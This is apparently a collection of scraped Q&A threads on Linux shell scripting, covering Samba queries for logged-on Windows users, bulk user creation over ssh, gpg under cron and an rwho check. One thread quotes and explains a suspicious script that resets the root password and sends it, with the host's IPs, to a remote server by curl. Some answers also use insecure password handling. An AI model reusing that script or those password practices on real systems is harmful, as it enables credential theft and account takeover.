I'm working on a project that needs to determine the username currently logged into a Windows workstation from a Linux client. The Linux client has the IP address / hostname of the workstation, and can potentially access the Active Directory domain controller, but has nothing else.
I understand that the "psloggedon \hostname" utility from Windows would do the job, but I'm looking for a Linux/Unix alternative.
Any suggestions?
This is the script I'm using. It requires Samba, i think at least version 3.x, it only asks for domain admin password once per run, not really secure but its better than hardcoding into the script.
#!/bin/bash
ADMIN_USER='DOMAIN_NAME\Administrator'
DOMAIN_CONTROLLER='hostname.of.domain.controller'
#
die () {
echo >&2 "$#"
exit 1
}
# Die if computer name missing
[ "$#" -eq 1 ] || die "Usage: loggedon <computer>"
COMPUTER=$1
# Store domain admin password in a variable to avoid asking every time.
read -s -p "Please provide domain administrator password: " ADMIN_PASSWORD
echo
# Store all sids logged on $COMPUTER inside an array
# Notice I'm using PASSWD= environement variable to push the admin password
# to net command, this way it won't ask for it.
#
SIDs=(`PASSWD=$ADMIN_PASSWORD /usr/bin/net rpc registry enumerate 'HKEY_USERS' -S $COMPUTER -U $ADMIN_USER | grep _Classes | cut -d '=' -f2 | sed 's/ //g'`)
if [ "${#SIDs[#]}" -gt 0 ]; then
printf "Found %s logged on $COMPUTER\n" "${SIDs[#]}"
echo
# Retrieves CommonName attribute from DC for each SID
for i in "${SIDs[#]}"
do
:
RAW_USER=`PASSWD=$ADMIN_PASSWORD net ads sid -S $DOMAIN_CONTROLLER -U Administrator $i`
#RAW_USER contains all attributes from ldap, we need to clean it first
USER=`echo $RAW_USER | egrep -o 'cn: (.+)sn:' | sed -e 's/sn\://g'`
echo "$USER is logged on $COMPUTER"
done
else
echo Nobody is logged on $COMPUTER
fi
Related
I made a script to add one same user with one same password to many servers:
#!/bin/bash
password=`cat /root/scripts/password`
for i in `cat /root/scripts/LIST_TEST.txt`
do
printf "Serveur : $i \n"
ssh -tt -o PasswordAuthentication=no $i
adduser newuser
yes `echo $password` | passwd newuser
exit 0
done
Also I'm in root when using this script, it seems that the user is created but the password doesn't get changed, as I cannot login when I try ssh newuser#server.
What is bothering me is that when I manually log into the server as root, and do the command yes `echo $password` | passwd newuser and then logout and try again newuser#server, it works...
The script looks like this now it is a bit clearer but it still doesn't add the right password, I don't know what it gives as a new password...
#!/bin/bash
password=`cat /root/scripts/password`
for i in `cat /root/scripts/LIST_TEST.txt`
do
printf "Serveur : $i \n"
ssh $i 'adduser newuser; yes $password | passwd newuser'
echo $password
done
Try to create a script which will be changing the passwords and execute that in the remote machine like this:
Change your fist script:
#!/bin/bash
password=`cat /root/scripts/password`
for i in `cat /root/scripts/LIST_TEST.txt`
do
printf "Serveur : $i \n"
#Password is passed as $1 to the next script
cat ./paschange.sh $passwd | ssh $i #Command to excecute the script
echo $password
done
And paschange.sh will be:
#!/bin/bash
adduser newuser
yes $1 | passwd newuser #Password is passed as $1
Note that this assumes:
You will create a user named: 'newuser' with the same name in ALL servers
He will have the same password for all servers
You are using the same name to login yourself to all those servers to run the script, which the username you have on the computer you are currently executing this script.
I found this entry in my crontab:
##reboot /usr/local/bin/email_passwordscript.sh
Although it is commented out, it worried me so I looked for this script in /usr/local/bin. I found the following script in my folder, but interestingly with a different name (set_password.sh):
#!/bin/sh
PASSWORD=$1
if [ "$#" -eq 0 ]; then
IPS=$(hostname -I)
PASSWORD=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | head -c 12)
IPS=$(echo $IPS | sed 's/ /%20/g')
OLD_PASSWORD=1
fi
echo "PASSWORD IS $PASSWORD" >> /var/log/new_passwordscript.log
echo "root:$PASSWORD" | chpasswd
hostname_str=`hostname`
sed -i "s/%HOSTNAME%/$hostname_str/" /etc/zabbix/zabbix_agentd.conf
if [ $OLD_PASSWORD == 1 ]; then
curl -X GET "http://172.16.98.14:8887/passwordemailservice?ip=$IPS&password=$PASSWORD" >> /var/lo
g/passwordscript.log
fi
Is this an attempt to hack my machine? If so, can anyone offer clues on how this has happened? It appears to be someone on my local network, but that IP address does not provide any clues i.e. there is no response.
This code seems dangerous.
The code changes the root password of a machine and sends the IP address of the machine along with its password to a remote computer.
How it works:
PASSWORD=$1
Assigns the first argument in the call to password
if [ "$#" -eq 0 ];
IPS=$(hostname -I)
PASSWORD=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | head -c 12)
IPS=$(echo $IPS | sed 's/ /%20/g')
OLD_PASSWORD=1
fi
Checks to see if there is an argument e.g ./email_passwordscript.sh XXX. If there isn't one it will generate a random password.
echo "root:$PASSWORD" | chpasswd
This line changes the password
curl -X GET "http://172.16.98.14:8887/passwordemailservice?ip=$IPS&password=$PASSWORD"
Sends the password to a remote server.
How Did it happen?
This is difficult to answer as there are many ways this script could have gotten on to your computer such as:
Someone having physical access to your machine
Unintentionally installing malicious software
I am using below code to ssh to different nodes and find if an user exists or not. If the user doesn't exist it will create it.
The script works fine if I don't do ssh but it fails if I do ssh.
How can I go through different nodes using this script?
for node in `nodes.txt`
usr=root
ssh $usr#$node
do
if [ $(id -u) -eq 0 ]; then
read -p "Enter username : " username
read -s -p "Enter password : " password
egrep "^$username" /etc/passwd >/dev/null
if [ $? -eq 0 ]; then
echo "$username exists!"
exit 1
else
pass=$(perl -e 'print crypt($ARGV[0], "password")' $password)
useradd -m -p $pass $username
[ $? -eq 0 ] && echo "User has been added to system!" || echo "F
ailed to add a user!"
fi
else
echo "Only root may add a user to the system"
exit 2
fi
done
Your script has grave syntax errors. I guess the for loop at the beginning is what you attempted to add but you totally broke the script in the process.
The syntax for looping over lines in a file is
while read -r line; do
.... # loop over "$line"
done <nodes.txt
(or marginally for line in $(cat nodes.txt); do ... but this has multiple issues; see http://mywiki.wooledge.org/DontReadLinesWithFor for details).
If the intent is to actually run the remainder of the script in the ssh you need to pass it to the ssh command. Something like this:
while read -r node; do
read -p "Enter user name: " username
read -p -s "Enter password: "
ssh root#"$node" "
# Note addition of -q option and trailing :
egrep -q '^$username:' /etc/passwd ||
useradd -m -p \"\$(perl -e 'print crypt(\$ARGV[0], \"password\")' \"$password\")" '$username'" </dev/null
done <nodes.txt
Granted, the command you pass to ssh can be arbitrarily complex, but you will want to avoid doing interactive I/O inside a root-privileged remote script, and generally make sure the remote command is as quiet and robust as possible.
The anti-pattern command; if [ $? -eq 0 ]; then ... is clumsy but very common. The purpose of if is to run a command and examine its result code, so this is better and more idiomatically written if command; then ... (which can be even more succinctly written command && ... or ! command || ... if you only need the then or the else part, respectively, of the full long-hand if/then/else structure).
Maybe you should only do the remote tasks via ssh. All the rest runs local.
ssh $user#$node egrep "^$username" /etc/passwd >/dev/null
and
ssh $user#$node useradd -m -p $pass $username
It might also be better to ask for username and password outside of the loop if you want to create the same user on all nodes.
I am working on a script which prompts the user for their username. Once entered, the script uses the 'rwho' command to get a list of users who are logged into the network. It should crosscheck the text they entered (their username) with the results from the rwho command.
If a match is found then it displays a message saying so, if not then it also makes the user aware of this.
Here is the script and my attempt so far:
#!/bin/sh
#
# User network checking script
#
# Using rwho command to get user list
OUTPUT="$(rwho)"
echo "${OUTPUT}"
# Prompt for username
echo "Please enter your username: "
read username
# Input validation
if [ -z "$username"]
then
echo "No username supplied"
echo "Please enter your username: "
read username
fi
# Search for user
if `echo ${OUTPUT} | grep "${username}" 1>/dev/null 2>&1'
then
echo "$username is logged in."
else
echo "$username is not present."
fi
I consistently get errors with the Search for User part. I don't have outstanding knowledge of Linux so if anyone could fix this and help me I would be greatly appreciative.
Your usage of quotes is weird.
if echo "$OUTPUT" | grep -q "$username"
should work.
-q makes grep quiet (and is shorter than your redirections).
I have a script which executes the gpg encryption command in a sh script throught cronjob.
This is a part of my script
do
gpg --batch --no-tty --yes --recipient $Key --output $Outputdir/${v}.pgp --encrypt ${v}
echo "$?"
if ["$?" -eq 0 ];
then
mv $Inputdir/${v} $Readydir/
echo "file moved"
else
echo "error in encryption"
fi
done
the echo $? gives value as 2.
tried the bellow command also
gpg --batch --home-dir dir --recipient $Key --output $Outputdir/${v}.pgp --encrypt ${v}
where dir=/usr/bin/gpg
My complete script
#set -x
PT=/gonm1_apps/xfb/ref/phoenix_drop
Inputdir=`grep Inputdir ${PT}/param.cfg | cut -d "=" -f2`
Outputdir=`grep Outputdir ${PT}/param.cfg | cut -d "=" -f2`
Key=`grep Key ${PT}/param.cfg | cut -d "=" -f2`
Readydir=`grep Readydir ${PT}/param.cfg | cut -d "=" -f2`
echo $USER
if [ "$(ls -la $Inputdir | grep -E 'S*.DAT')" ]; then
echo "Take action $Inputdir is not Empty"
cd $Inputdir
for v in `ls SID_090_*`
do
gpg --recipient $Key --output $Outputdir/${v}.pgp --encrypt ${v}
echo "$?"
if ["$?" -eq 0 ];
then
mv $Inputdir/${v} $Readydir/
echo "file moved"
else
echo "error in encryption"
fi
done
cd ${PT}
else
echo "$Inputdir is Empty"
fi
GnuPG manages individual keyrings and "GnuPG home directories" per user. A commmon problem when calling GnuPG from web services or cronjobs is executing them as another user.
This means that the other user's GnuPG does look up keys in the wrong key ring (home directory), and if that's fixed it should not have access permissions to the GnuPG home directory at all (not an issue when running a cron or web server as root, but that shouldn't be done for pretty much this reason first hand).
There are different ways to mitigate the issue:
Run the web server or cron job under another user. This might be a viable solution for cron jobs, but very likely not for web services. sudo or su might help at running GnuPG as another user.
Import the required (private/public) keys to the other user's GnuPG home directory, for example by switching to the www-data or root user (or whatever it's called on your machine).
Change GnuPG's behavior to use another user's home directory. You can do so with --home-dir /home/[username]/.gnupg or shorter --home-dir ~username/.gnupg if your shell resolves the short-hand. Better don't do this, as GnuPG is very strict at verifying access privileges and refuse to work if those are too relaxed. GnuPG doesn't like permissions allowing other users but the owner to access a GnuPG home directory at all, for good reasons.
Change GnuPG's behavior to use a completely unrelated folder as home directory, for example somewhere your application is storing data anyway. Usually, the best solution. Make sure to set the owner and access permissions appropriately. An example would be the option --home-dir /var/lib/foo-product/gnupg.
if
the echo $USER prints as root when executed on cronjob and as
username when executed manually
Then you need to login as the user and use a command such as "crontab -e" to add a cronjob for that user to run your script